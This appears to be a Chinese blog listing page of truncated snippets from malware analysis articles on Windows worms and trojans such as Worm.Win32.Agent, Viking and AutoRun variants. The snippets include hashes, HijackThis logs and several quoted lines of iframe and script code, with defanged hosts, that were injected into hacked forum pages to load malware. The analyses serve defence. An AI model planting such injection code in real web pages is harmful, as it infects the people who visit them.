Worm.Win32.Agent.t分析
出处:安天CERT
病毒标签:
病毒名称: Worm.Win32.Agent.t
病毒类型: 蠕虫类
文件 MD5: C4BFC29229607CBEA877CBC40EB5D098
公开范围: 完全公开
危害等级: 4
文件长度: 脱壳前52,736 字节,脱壳后145,920 字节
感染系统: Win98以上版本
开发
转载
精选
2007-09-10 22:07:03
705阅读
endurer 原创2006-11-17 第1版有位网友的电脑,这两天瑞星总发现灰鸽子。在该网友发来的HijackThis的log发现如下可疑项:/-------O2 - BHO: Java Class - {38CE3843-4420-4AA8-A129-F9E771B4561B} - C:/WINDOWS/java/classes/java.dllO20 - AppInit_D
原创
2022-12-07 14:15:31
90阅读
某文学论坛被挂马 Worm.Win32.Agent.ipi/Trojan.Win32.Agent.avtendurer 原创2007-08-19 第1版Google了一下,发现Google已经标注了:该网站可能含有恶意软件,有可能会危害您的电脑。 检查论坛的网页代码,被加入:/---<iframe src=hxxp://a**aa.3*6**96**78.cn/xiaoyu.htm
原创
2022-11-30 17:16:45
58阅读
遭遇Worm.Win32.Viking,Worm.Win32f.ysv,Trojan.PSW.Win32.OnlineGames等endurer 原创2007-07-30 第1版刚才,“遭遇Worm.Viking.tc,Trojan.PSW.Win32.OnlineGames等”一文中的朋友又来求援,说电脑又出现上次的症状……过去一看,系统托盘区里小红伞的图标不见了,询问得知是他卸载了
原创
2022-11-30 17:18:07
100阅读
第1版有一位朋友,他把移动硬盘接到电脑上使用,上午还正常,但下午用时则有数据保护的出错提示信息。该朋友电脑使用的是Win XP SP2,因未联网,所以不能从网上下载 HijackThis 等软件来分析。打任务管理器,发现一个名为wincfgs.exe的进程,图标为一个黄色问号,十分可疑,终止了。打开命令提示符窗口搜索文件:/--------
原创
2022-11-10 23:06:48
123阅读
病毒标签:
病毒名称: Worm.Win32.Wogue.o病毒类型: 蠕虫类文件 MD5: 90C509FA6A6C2FA798DBE1CFD7F0E4F1公开范围: 完全公开 危害等级: 4文件长度: 19,456 字节感染系统: Windows98以上版本 开发工具: Borland Delphi 5.0加壳类型: PECompact 2.x
病毒描述:
原创
2007-10-25 13:46:26
1266阅读
2评论
文学论坛挂的马换 成 Worm.Win32.Agent.imh 了endurer 原创2007-08-22 第1版上回妯现挂的是 Worm.Win32.Agent.ipi/Trojan.Win32.Agent.avt刚才一不小心又进去了,卡巴没反应~一位刚进去的网友说瑞星发现、并清除了三个 Worm.Win32.Agent.imh,都在IE缓存里,文件名是 ga[1].exe之类。
原创
2022-11-30 17:16:40
51阅读
文学论坛挂的马 Worm.Win32.Agent.imh 的简单分析endurer 原创2007-08-23 第1版昨天没能下载文学论坛挂的马,刚才再试,终于下载回来了。ga.exe采用UPX壳脱壳前:文件说明符 : D:/test/ga.exe属性 : A---获取文件版本信息大小失败!创建时间 : 2007-8-23 21:9:26修改时间 : 2007-8-23 21:9:2
原创
2022-11-30 17:16:31
62阅读
endurer 原创2007-06-12 第1版 原来那个Viking还在,又加了一个Viking,几个 Trojan 和 和 Worm。网站首页被植入代码:/---<iframe name="tt" src="exobud.htm" width="580" height="25" scrolling="Auto" frameborder="0"></iframe><iframe src=
原创
2022-11-23 17:26:38
85阅读
遭遇Worm.Win32.Viking.lm/Worm.Viking.tc,Trojan.PSW.Win32.OnlineGames等1endurer 原创2007-07-25 第1版昨天中午,一位朋友的电脑开机时出现一堆出错提示框,无法通过任务栏上程序图标切换程序,电脑反应很慢,有时自动重启……让偶帮忙检修。下载 pe_xscan 扫描 log 并分析,发现(进程模块部分有省略):/
原创
2022-12-07 13:35:21
66阅读
瑞星的报告来的病毒摘要:危险等级:★★★病毒名称:Worm.IM.Win32.Skype.a截获时间:2007-9-11入库版本:19.40.12类型:病毒感染的操作系统:Windows XP, Windows NT, Windows Server 2003, Windows 2000威胁情况:传播级别:高清除难度:困难破坏力:低技术细节:此程序为worm类型程序1.创建名为syksp2.0.0.
转载
精选
2007-09-15 20:05:40
1044阅读
1评论
遭遇Worm.Win32.Viking.lm/Worm.Viking.tc,Trojan.PSW.Win32.OnlineGames等2endurer 原创2007-07-26 第1版看到 C:/WINDOWS/RichDll.dll 和 O4 - HKLM/../Run: [load] C:/WINDOWS/uninstall/rundl132.exe,就让偶想起Viking……停止
原创
2022-12-07 13:35:07
93阅读
抓到通过U盘传播的 Virus.Win32.AutoRun.ab/Worm.Win32.Agent.zhw/setup.exeendurer 原创2007-12-25 第1版在一位同事拿来拷文件的U盘中发现的。把U盘接入电脑后,先运行WinRAR检查U盘,发现其中有文件autorun.inf,查看文件内容,发现要运行的文件是setup.exe。文件说明符 : G:/setup.ex
原创
2022-11-22 16:55:34
95阅读
蠕虫程序 Worm.Win32.AutoRun.dg解决方案病毒名称Worm.Win32.AutoRun.dg捕获时间2007-10-14病毒症状 该病毒是一个使用Delphi编写的蠕虫程序,长度为25,600字节,图标为常规可执行文件图标,病毒扩展名为exe。病毒分析 该蠕虫程序激活后,在%sys
转载
2024-06-11 21:12:59
31阅读
一个传播 Worm.Win32.Otwycal.c / Worm.Win32.Infei.a 的网站endurer 原创2008-04-07 第2版 补充瑞星的回复 第1版该网站首页包含代码:/---document.write("<iframe src=hxxp://a**.1**58d**m/b2.htm width
原创
2022-11-22 16:10:21
53阅读
原文地址:[url]http://secure.itdigger.com/2007[/url]\09\14/183526937.htm一、病毒相关分析: 病毒标签: 病毒名称:IM-Worm.Win32.MSN-Pictures.gen 病毒类型:蠕虫 危害级别:3 感染平台:Windows 平台 病毒大小:24,
转载
精选
2007-09-15 19:34:58
1344阅读
endurer 原创2007-06-15 第1版一位网友说他的电脑不管打开什么网站的网页,显示的都是hxxp://218.*1*.1*4.170的VIP1.HTM、VIP2.HTM等。hxxp://218.*1*.1*4.170/VIP1.HTM 的内容采用US-ASCII编码。到http://purpleendurer.ys168.com 下载US-ASCII编码解码程序进行解码,得到的
原创
2022-12-07 14:05:46
103阅读
endurer 原创2007-04-03 第1版昨天一位网友的电脑在接入U盘后,瑞星注册表监控提示有程序试图修改注册表……现在使用,都提示有错误,要重装一次才能用……让偶帮助检查。到 http://endurer.ys168.com下载 IceSword,发现可疑进程:c:/windows/system32/ime/svchost.exe,终止了。下载 pe_xscan 扫描
原创
2022-12-01 15:44:48
123阅读
原帖:[url]http://bbs.2dai.com/thread-660164-1-1.html[/url]作者:nhxycfans
样本来源: [病毒样本] 11-01下午的 病毒样本:SetupHide.exe 病毒名称:Trojan.Win32.Agent.clt 中文名称: 病毒类型: 木马类 文件 MD5: f862a0976b57f97cf94a63c5cc3f029
转载
精选
2007-11-03 17:07:46
1426阅读
某论坛挂马Worm.Win32.Autorun.eyh论坛网页包含代码:/------/hxxp://www.5**4*z**c.cn/1**7aq/q.js输出代码:/---<IFRaME src="hxxp://m**.sf*s3**wws.cn/03/x4.htm" width=1 height=0></IFRAME>hxxp://m**.sf*s3**wws.cn/03/x4.
原创
2022-12-12 15:17:23
75阅读
